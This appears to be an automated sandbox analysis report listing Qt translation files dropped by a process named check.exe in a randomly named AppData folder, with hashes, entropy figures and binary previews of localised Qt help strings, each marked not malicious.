                                                                                                                                                                                                            SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                            SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.680458675741643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                            MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                            SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                            SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                            SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.463523104731333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                            MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                            SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                            SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                            SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):323590
                                                                                                                                                                                                            Entropy (8bit):4.568068046062524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                            MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                            SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                            SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                            SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                                                            Entropy (8bit):3.880645689209568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                            MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                            SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                            SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                            SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
